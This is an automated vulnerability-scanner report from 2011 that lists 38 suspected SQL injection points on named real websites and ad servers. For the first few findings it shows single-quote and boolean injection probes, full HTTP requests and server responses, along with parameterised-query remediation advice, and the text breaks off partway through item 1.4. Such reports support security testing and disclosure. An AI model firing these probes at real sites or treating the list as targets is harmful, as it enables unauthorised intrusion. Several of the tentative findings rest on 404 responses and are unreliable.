Single Quote, SQL Injection, CAPEC-66, CWE-89, DORK

CAPEC-66: SQL Injection, CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 17:03:59 CST 2011.


Contents

The DORK Report

Loading

1. SQL injection

1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 2]

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

1.3. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

1.4. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

1.5. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

1.6. http://ct.buzzfeed.com/wd/UserWidget [amp;to parameter]

1.7. http://ct.buzzfeed.com/wd/UserWidget [name of an arbitrarily supplied request parameter]

1.8. http://g-pixel.invitemedia.com/gmatcher [cver parameter]

1.9. http://g-pixel.invitemedia.com/gmatcher [frequency cookie]

1.10. http://g-pixel.invitemedia.com/gmatcher [id parameter]

1.11. http://ilinks.industrybrains.com/showct [User-Agent HTTP header]

1.12. http://local.nissanusa.com/zip.aspx [vehicle parameter]

1.13. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]

1.14. http://tap.rubiconproject.com/oz/sensor [k parameter]

1.15. http://tap.rubiconproject.com/oz/sensor [put_2132 cookie]

1.16. http://redcated/APM/iview/289800145/direct [Referer HTTP header]

1.17. http://redcated/APM/iview/289800145/direct [name of an arbitrarily supplied request parameter]

1.18. http://web.blogads.com/adspotsfolder/get_adspots_data [persistent_uid parameter]

1.19. http://www.france24.com/en/all-wire [name of an arbitrarily supplied request parameter]

1.20. http://www.ians.in/ [name of an arbitrarily supplied request parameter]

1.21. http://www.nbcmiami.com/ [name of an arbitrarily supplied request parameter]

1.22. http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html [name of an arbitrarily supplied request parameter]

1.23. http://www.nbcmiami.com/news/local-beat/UM-Study-Says-Energy-Drinks-Pose-Serious-Risk-to-Kids-116150794.html [dr parameter]

1.24. http://www.rollingstone.com/ [name of an arbitrarily supplied request parameter]

1.25. http://www.sky.com/skynews/home [REST URL parameter 2]

1.26. http://www.thedailybeast.com/author/howard-kurtz/ [REST URL parameter 2]

1.27. http://www.thedailybeast.com/author/lloyd-grove [REST URL parameter 2]

1.28. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]

1.29. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 1]

1.30. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 2]

1.31. http://x17online.com/celebrities/sean_penn/sean_penn_throws_a_hissy_fit_at_lax_security_airport_021111.php [REST URL parameter 3]

1.32. http://x17online.com/css/main.css [REST URL parameter 1]

1.33. http://x17online.com/css/main.css [REST URL parameter 2]

1.34. http://x17online.com/favicon.ico [REST URL parameter 1]

1.35. http://x17online.com/js/common.js [REST URL parameter 1]

1.36. http://x17online.com/js/common.js [REST URL parameter 2]

1.37. http://x17online.com/js/main.js [REST URL parameter 1]

1.38. http://x17online.com/js/main.js [REST URL parameter 2]



1. SQL injection
There are 38 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb'%20and%201%3d1--%20/sync-min.html HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; pup_1986=1297646610316; put_1986=4760492999213801733; pup_2132=1297647252381; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_1902=1297647258036; pup_2084=1297647259114; pup_2101=1297647259723; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; pup_1512=1297647261058; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; pup_2025=1297647279013; pup_2100=1297647280556; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1185=1297647281899; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; pup_w55c=1297647284795; pup_1197=1297647284961; pup_1430=1297647285484; pup_2081=1297647285674; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1297647386216; pup_1994=1297647395715; pup_rubicon=1297647406937; csi18=3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3165136.js^1^1297648333^1297648333&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses18=12414^27; ses9=12414^31; csi9=3144262.js^1^1297652507^1297652507&3188560.js^1^1297652327^1297652327&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses2=4801^2; csi2=3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367; khaos=GIPAEQ2D-C-IOYY; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; cd=false; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk15=0; ses15=12414^61&4801^1; csi15=3143937.js^6^1297648330^1297713625&3188561.js^4^1297650509^1297652505&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3188562.js^1^1297648333^1297648333&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 325
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 14 Feb 2011 21:25:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=1-- /sync-min.html was not found o
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb'%20and%201%3d2--%20/sync-min.html HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; pup_1986=1297646610316; put_1986=4760492999213801733; pup_2132=1297647252381; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_1902=1297647258036; pup_2084=1297647259114; pup_2101=1297647259723; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; pup_1512=1297647261058; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; pup_2025=1297647279013; pup_2100=1297647280556; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1185=1297647281899; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; pup_w55c=1297647284795; pup_1197=1297647284961; pup_1430=1297647285484; pup_2081=1297647285674; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1297647386216; pup_1994=1297647395715; pup_rubicon=1297647406937; csi18=3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3165136.js^1^1297648333^1297648333&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses18=12414^27; ses9=12414^31; csi9=3144262.js^1^1297652507^1297652507&3188560.js^1^1297652327^1297652327&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses2=4801^2; csi2=3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367; khaos=GIPAEQ2D-C-IOYY; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; cd=false; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk15=0; ses15=12414^61&4801^1; csi15=3143937.js^6^1297648330^1297713625&3188561.js^4^1297650509^1297652505&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3188562.js^1^1297648333^1297648333&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 234
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 14 Feb 2011 21:25:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=2-- /sync-min.html was not found o
...[SNIP]...
</p>
</body></html>

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; pup_1986=1297646610316; put_1986=4760492999213801733; pup_2132=1297647252381; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_1902=1297647258036; pup_2084=1297647259114; pup_2101=1297647259723; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; pup_1512=1297647261058; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; pup_2025=1297647279013; pup_2100=1297647280556; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1185=1297647281899; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; pup_w55c=1297647284795; pup_1197=1297647284961; pup_1430=1297647285484; pup_2081=1297647285674; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1297647386216; pup_1994=1297647395715; pup_rubicon=1297647406937; csi18=3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3165136.js^1^1297648333^1297648333&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses18=12414^27; ses9=12414^31; csi9=3144262.js^1^1297652507^1297652507&3188560.js^1^1297652327^1297652327&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses2=4801^2; csi2=3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367; khaos=GIPAEQ2D-C-IOYY; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; cd=false; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk15=0; ses15=12414^61&4801^1; csi15=3143937.js^6^1297648330^1297713625&3188561.js^4^1297650509^1297652505&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3188562.js^1^1297648333^1297648333&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 325
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 14 Feb 2011 21:24:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; pup_1986=1297646610316; put_1986=4760492999213801733; pup_2132=1297647252381; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_1902=1297647258036; pup_2084=1297647259114; pup_2101=1297647259723; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; pup_1512=1297647261058; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; pup_2025=1297647279013; pup_2100=1297647280556; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1185=1297647281899; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; pup_w55c=1297647284795; pup_1197=1297647284961; pup_1430=1297647285484; pup_2081=1297647285674; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1297647386216; pup_1994=1297647395715; pup_rubicon=1297647406937; csi18=3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3165136.js^1^1297648333^1297648333&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses18=12414^27; ses9=12414^31; csi9=3144262.js^1^1297652507^1297652507&3188560.js^1^1297652327^1297652327&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses2=4801^2; csi2=3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367; khaos=GIPAEQ2D-C-IOYY; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; cd=false; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk15=0; ses15=12414^61&4801^1; csi15=3143937.js^6^1297648330^1297713625&3188561.js^4^1297650509^1297652505&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3188562.js^1^1297648333^1297648333&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 234
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 14 Feb 2011 21:24:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o
...[SNIP]...
</p>
</body></html>

1.3. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The esi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true'&bannerID=173542&referer=www.nbcmiami.com HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 20:25:03 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true''&bannerID=173542&referer=www.nbcmiami.com HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Mon, 14 Feb 2011 20:25:03 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22560

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.4. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173542&referer=www.nbcmiami.com&1'=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170474=0; IXAIBanners2203=170474; IXAICampaignCounter2356=0; IXAIControlCounter2356=0; IXAIBannerCounter173161=0; IXAIBanners2356=173161; IXAI2356=FFT; IXAIinvited2356=true; lastInvite=1/18/2011 3:43:40 PM; DW=1fe494201295383799; IXAIBanners2405=173719; IXAIBannerCounter173719=1; IXAIFirstHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAILastHit2405=2%2f7%2f2011+8%3a19%3a02+AM; IXAICampaignCounter2405=1; IXAICampaignCounter2249=0; IXAIControlCounter2249=0; IXAIBannerCounter170437=0; IXAIBanners2249=170437; IXAIBanners2382=173542; IXAIBannerCounter173542=1

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
